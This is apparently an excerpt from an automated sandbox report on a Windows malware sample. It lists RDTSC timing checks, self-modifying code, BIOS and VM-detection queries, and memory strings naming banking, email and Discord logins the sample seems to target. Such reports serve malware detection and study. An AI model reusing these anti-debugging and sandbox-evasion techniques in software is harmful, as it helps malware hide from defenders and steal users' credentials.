Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54001C7 second address: 54001CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54001CB second address: 54001CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54001CF second address: 54001D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54001D5 second address: 54001F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E9D0B3549h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54001F2 second address: 54001F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54001F6 second address: 5400219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a jmp 00007F6E9D0B353Dh 0x0000000f je 00007F6E9D0B3733h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400219 second address: 540021F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 540021F second address: 5400225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400225 second address: 5400229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400229 second address: 5400285 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea ecx, dword ptr [ebp-14h] 0x0000000b jmp 00007F6E9D0B3548h 0x00000010 mov dword ptr [ebp-14h], edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F6E9D0B3549h 0x0000001c add ecx, 6AAE09F6h 0x00000022 jmp 00007F6E9D0B3541h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400285 second address: 540028B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54002F0 second address: 54002F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54002F4 second address: 540030D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9CE04435h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 540030D second address: 5400358 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6E9D0B3547h 0x00000009 and esi, 45A64FFEh 0x0000000f jmp 00007F6E9D0B3549h 0x00000014 popfd 0x00000015 mov eax, 1C1A0C47h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d test eax, eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400358 second address: 540035C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 540035C second address: 5400360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400360 second address: 5400366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400366 second address: 5400402 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6E9D0B353Ch 0x00000008 pop esi 0x00000009 call 00007F6E9D0B353Bh 0x0000000e pop ecx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jg 00007F6F0D71163Dh 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F6E9D0B3545h 0x0000001f adc esi, 22E24E46h 0x00000025 jmp 00007F6E9D0B3541h 0x0000002a popfd 0x0000002b mov ecx, 3381D0F7h 0x00000030 popad 0x00000031 js 00007F6E9D0B3580h 0x00000037 pushad 0x00000038 mov ecx, 241BE7EFh 0x0000003d mov eax, 35E9140Bh 0x00000042 popad 0x00000043 cmp dword ptr [ebp-14h], edi 0x00000046 jmp 00007F6E9D0B353Eh 0x0000004b jne 00007F6F0D7115EEh 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F6E9D0B3547h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400402 second address: 5400408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400408 second address: 5400453 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+08h] 0x0000000b jmp 00007F6E9D0B3547h 0x00000010 lea eax, dword ptr [ebp-2Ch] 0x00000013 pushad 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F6E9D0B3542h 0x0000001b and al, 00000008h 0x0000001e jmp 00007F6E9D0B353Bh 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400453 second address: 540049C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 call 00007F6E9CE04436h 0x0000000a mov eax, 3A3BD881h 0x0000000f pop eax 0x00000010 popad 0x00000011 push ebx 0x00000012 jmp 00007F6E9CE0442Ah 0x00000017 mov dword ptr [esp], esi 0x0000001a pushad 0x0000001b pushad 0x0000001c push eax 0x0000001d pop ebx 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 mov ax, 95E5h 0x00000025 popad 0x00000026 nop 0x00000027 pushad 0x00000028 movsx ebx, ax 0x0000002b popad 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 540049C second address: 54004A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54004A0 second address: 54004A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54004A4 second address: 54004AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54004AA second address: 54004C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E9CE04436h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54004C4 second address: 54004E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B353Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, bx 0x00000012 mov cx, di 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54004E0 second address: 54004E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54004E5 second address: 5400597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F6E9D0B3544h 0x0000000a sub cx, E5E8h 0x0000000f jmp 00007F6E9D0B353Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebx 0x00000019 pushad 0x0000001a mov al, 14h 0x0000001c pushfd 0x0000001d jmp 00007F6E9D0B3541h 0x00000022 and eax, 17FBBC06h 0x00000028 jmp 00007F6E9D0B3541h 0x0000002d popfd 0x0000002e popad 0x0000002f push eax 0x00000030 pushad 0x00000031 mov ax, dx 0x00000034 pushfd 0x00000035 jmp 00007F6E9D0B3543h 0x0000003a add cx, 0B3Eh 0x0000003f jmp 00007F6E9D0B3549h 0x00000044 popfd 0x00000045 popad 0x00000046 xchg eax, ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F6E9D0B3548h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400597 second address: 540059D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 540059D second address: 54005AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E9D0B353Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54005AE second address: 54005B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 53F0EE0 second address: 53F0F0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6E9D0B3547h 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov esi, 4CB4EDFDh 0x00000015 mov ecx, 7A676CF9h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 53F0F0D second address: 53F0F34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9CE0442Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f call 00007F6E9CE0442Dh 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 53F0F34 second address: 53F0F72 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007F6E9D0B3543h 0x0000000e xchg eax, ecx 0x0000000f jmp 00007F6E9D0B3546h 0x00000014 push eax 0x00000015 pushad 0x00000016 mov di, 8374h 0x0000001a push eax 0x0000001b push edx 0x0000001c movsx ebx, ax 0x0000001f rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 53F0F72 second address: 53F0F7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 53F0F7D second address: 53F0F87 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400A7E second address: 5400A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400A82 second address: 5400A88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400A88 second address: 5400A8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400A8E second address: 5400A92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400A92 second address: 5400AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6E9CE0442Dh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F6E9CE0442Eh 0x00000014 mov ebp, esp 0x00000016 jmp 00007F6E9CE04430h 0x0000001b cmp dword ptr [75AB459Ch], 05h 0x00000022 pushad 0x00000023 mov edi, eax 0x00000025 mov ecx, 76ADBA09h 0x0000002a popad 0x0000002b je 00007F6F0D45234Ch 0x00000031 pushad 0x00000032 call 00007F6E9CE04431h 0x00000037 mov eax, 1C2E9517h 0x0000003c pop esi 0x0000003d popad 0x0000003e pop ebp 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400AFE second address: 5400B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400B04 second address: 5400B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400B09 second address: 5400B0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400B0F second address: 5400B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400B32 second address: 5400B38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400B38 second address: 5400B54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9CE0442Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 01181911h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400B54 second address: 5400B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400B58 second address: 5400B68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9CE0442Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400BFA second address: 5400C1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B3549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400C1E second address: 5400C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400C22 second address: 5400C6C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6E9D0B3548h 0x00000008 add si, 4658h 0x0000000d jmp 00007F6E9D0B353Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 je 00007F6F0D6F726Ah 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f call 00007F6E9D0B353Eh 0x00000024 pop esi 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400C6C second address: 5400C9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9CE0442Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp+08h], 00002000h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6E9CE04437h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5410936 second address: 541096A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F6E9D0B3542h 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6E9D0B3547h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 541096A second address: 54109A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007F6E9CE0442Bh 0x0000000c add eax, 01EC1FDEh 0x00000012 jmp 00007F6E9CE04439h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54109A7 second address: 54109BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B353Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54109BA second address: 54109C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54109C0 second address: 5410AA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F6E9D0B353Ch 0x0000000e mov dword ptr [esp], esi 0x00000011 jmp 00007F6E9D0B3540h 0x00000016 mov esi, dword ptr [ebp+0Ch] 0x00000019 jmp 00007F6E9D0B3540h 0x0000001e test esi, esi 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F6E9D0B353Eh 0x00000027 add esi, 49F72BC8h 0x0000002d jmp 00007F6E9D0B353Bh 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007F6E9D0B3548h 0x00000039 or ecx, 6F142E28h 0x0000003f jmp 00007F6E9D0B353Bh 0x00000044 popfd 0x00000045 popad 0x00000046 je 00007F6F0D6F0EA2h 0x0000004c jmp 00007F6E9D0B3546h 0x00000051 cmp dword ptr [75AB459Ch], 05h 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b mov bx, 38A0h 0x0000005f pushfd 0x00000060 jmp 00007F6E9D0B3549h 0x00000065 sbb ax, 17A6h 0x0000006a jmp 00007F6E9D0B3541h 0x0000006f popfd 0x00000070 popad 0x00000071 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5410AA7 second address: 5410AEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9CE04431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6F0D459E01h 0x0000000f jmp 00007F6E9CE0442Eh 0x00000014 xchg eax, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F6E9CE04437h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5410AEA second address: 5410AF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5410AF0 second address: 5410AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5410B64 second address: 5410BA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B3546h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov bx, cx 0x0000000e movzx eax, bx 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007F6E9D0B3544h 0x00000018 xchg eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5410BA3 second address: 5410BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5410BA7 second address: 5410BAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5410BAB second address: 5410BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5410C20 second address: 5410C78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6E9D0B3547h 0x00000009 sbb si, 6FEEh 0x0000000e jmp 00007F6E9D0B3549h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F6E9D0B3548h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5410C78 second address: 5410C8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E9CE0442Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5410C8A second address: 5410C8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Special instruction interceptor: First address: 828F72 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Special instruction interceptor: First address: A5EFB1 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\2oM46LNCOo.exe TID: 7768

Thread sleep time: -270000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\2oM46LNCOo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\2oM46LNCOo.exe

Last function: Thread delayed

Source: Amcache.hve.11.dr	Binary or memory string: VMware
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.11.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 2oM46LNCOo.exe, 00000002.00000002.1886070092.0000000001527000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1404582172.0000000001529000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1438851460.0000000001529000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1426169334.0000000001529000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: Amcache.hve.11.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: Amcache.hve.11.dr	Binary or memory string: vmci.sys
